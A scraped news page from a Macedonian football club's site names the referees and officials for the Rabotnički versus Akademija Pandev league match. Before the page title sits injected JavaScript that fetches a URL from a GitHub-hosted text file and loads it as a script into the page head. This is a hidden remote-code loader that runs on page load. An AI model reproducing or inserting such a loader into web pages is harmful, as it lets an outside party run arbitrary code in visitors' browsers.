;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Јован Качевски ќе го суди мечот Работнички – Академија Пандев
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Јован Качевски ќе го суди мечот Работнички – Академија Пандев

Работнички ќе го отвори третиот круг од првенството во Првата лига со натпревар на домашен терен против Академија Пандев. Дуелот ќе биде премиерен од 23.коло, ќе се одигра в сабота, со почеток во 15 часот на Националната арена „Тодор Проески“, а одредени се официјалните лица.

Главен судија на мечот ќе биде Јован Качевски од Струга, а ќе му помагаат Ацо Мацевски и Разме Бакрачески. Четврти судија е Фуркан Идризи (Тетово).

За делегат на натпреварот е одреден Благојче Ангелевски (Битола), а контролор на судењето ќе биде Зоран Петковски од Велес.